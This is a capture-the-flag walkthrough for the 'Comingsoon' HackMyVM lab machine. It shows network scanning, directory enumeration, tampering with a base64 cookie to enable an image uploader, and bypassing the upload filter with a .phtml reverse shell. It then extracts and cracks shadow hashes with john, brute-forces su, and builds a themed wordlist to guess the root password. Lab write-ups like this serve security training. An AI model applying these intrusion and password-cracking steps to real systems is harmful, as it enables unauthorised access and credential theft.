HackMyVM - Comingsoon

Find it

└─$ sudo netdiscover -r 10.0.0.0/24 -P|tee findit
[sudo] password for kali: 
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 10.0.0.1        08:00:27:96:87:13      1      60  PCS Systemtechnik GmbH
 10.0.0.90       08:00:27:03:05:3c      1      60  PCS Systemtechnik GmbH

-- Active scan completed, 2 Hosts found.


Scan it

└─$ nmap -T4 -p- -sC -sV -oN nmap.out 10.0.0.90 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-22 12:49 EST
Nmap scan report for 10.0.0.90
Host is up (0.00097s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|   3072 bc:fb:ec:b8:93:d4:e2:78:76:eb:1b:dc:4b:a7:7f:9b (RSA)
|   256 31:41:a0:d7:e9:3c:79:11:c2:f0:81:a0:fe:2d:f9:b0 (ECDSA)
|_  256 c9:34:17:00:31:75:4d:c0:3a:a5:b1:16:36:0d:bb:18 (ED25519)
80/tcp open  http    Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Bolt - Coming Soon Template
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.51 seconds

└─$ ssh 10.0.0.90      
kali@10.0.0.90: Permission denied (publickey).

So two ports: SSH (which looks like it is set to key-only authentication)
and HTTP on port 80.

Remote Shell


└─$ gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://10.0.0.90/ -x html,php,txt -o dir.txt --no-error -t 150
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.0.0.90/
[+] Method:                  GET
[+] Threads:                 150
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,php,txt
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2021/12/22 12:54:04 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 200) [Size: 1492]
/license.txt          (Status: 200) [Size: 528] 
/notes.txt            (Status: 200) [Size: 279] 
/index.php            (Status: 200) [Size: 3988]


notes.txt contains some useful bits:
Set ssh to use keys only (passphrase same as the password)

Just need to sort the images out:
resize and scp them or using the built-in image uploader.

Test the backups and delete anything not needed.

index.php contains a comment:
<!-- Upload images link if EnableUploader set -->
The index.php response also sets a cookie (visible with curl -v or in a browser's developer tools):

Set-Cookie: RW5hYmxlVXBsb2FkZXIK=ZmFsc2UK


└─$ echo RW5hYmxlVXBsb2FkZXIK| base64 -d;echo ZmFsc2UK| base64 -d

EnableUploader

false

Set the value to true...

└─$ echo -n true|base64                                          

dHJ1ZQ==

(Easier in a browser, and an upload button appears)

The uploader doesn't allow files with a .php suffix to be uploaded; trying various PHP extensions,
.phtml works and allows a reverse shell to be uploaded.

Escalate to User

From the reverse shell as www-data

Method 1: 
locate recent backup file in /var/backups and copy it to /var/www/html/assets/img
Download to kali box
gunzip and untar it
cd to ./etc
unshadow passwd shadow > unshadow
Note: john doesn't detect $y$ hashes correctly unless you specify the format:
john --wordlist=/usr/share/wordlists/rockyou.txt unshadow --format=crypt
This should find credentials for user... but not root.

Method 2:
Brute-force su on the box using suBF.sh with its default wordlist or rockyou:
https://github.com/carlospolop/su-bruteforce

Escalate to Root

The user home directory contains a file .oldpasswords
Past passwords can sometimes point to the current one if they follow a theme or a set format.
The theme looks like Animated Movies that contain numbers. Capitals are preserved but spaces removed...
Googling top 100 animated movies will provide the answers.
Alternatively you could try to generate a wordlist using something like:
curl https://www.rottentomatoes.com/top/bestofrt/top_100_animation_movies/|grep ")</a>"|sed 's/[(].*$//'|tr -d ' '> wordlist

Some trial and error manually (there are only a few candidates) or with suBF.sh should reveal the root password fairly quickly.
